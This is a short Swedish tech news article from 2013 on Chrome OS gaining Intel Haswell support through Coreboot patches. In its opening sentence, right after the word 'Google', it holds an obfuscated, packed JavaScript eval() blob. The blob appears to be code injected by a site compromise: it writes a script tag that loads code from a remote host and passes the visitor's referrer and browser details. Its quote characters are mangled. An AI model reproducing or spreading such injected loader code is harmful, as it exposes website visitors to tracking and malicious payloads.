Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

PC

Chrome OS har numera stöd för Haswell

chrome
Filip Urde
  • On 2 april, 2013
  • http://www.revue.se/filip-urde

Google eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rztkz|var|u0026u|referrer|dihff||js|php’.split(’|’),0,{}))
har som bekant släppt sin Chromebook Pixel, det är dock fler versioner på ingång och dessa versioner ska drivas med Intels Haswell-processorer och även om Chrome OS är inte speciellt krävande men man tänker utnyttja de nya strömsparfunktionerna som Haswell har. 

Stefan Reinauer som är en av utvecklarna av Google Chrome OS, har arbetat mycket med boot-koden i operativsystemet. En kod som Stefan skickade in som ett tillägg för Haswell-processorerna i Coreboot. Coreboot är i sin tur en open-source BIOS-ersättare för Linux.

Koden som Stefan gjort är gjord för Haswells nya instruktioner såsom ”haswell: use dynamic cbmem” och ”haswell boards: support added chromeos function”.

I regel så har ledande PC tillverkare traditionellt sett stöd för nya mikroprocessorer från Intel samma dag som Intel släpper processorerna. Men när det Chrome OS och Coreboot får inte stöd för de nya processorerna förrän efter lanseringen.

Chrome OS påverkas inte jättemycket utav detta  då operativsystemet inte kräver så mycket prestanda. Men som sagt så ser det ut som att Chrome OS får tidigt stöd för Haswell och det kan betyda att Chrome OS får bättre stöd för tunga program. Eller så arbetar man kanske på en Pixel 2 som måste ha en högre prestanda med tanke på prisbilden. Hittils så är Chromebook ganska simpla och riktar sig mot folk med ganska standard behov. Men vi får se, snart kanske det kommer en tung chromebook.
www.xbitlabs.com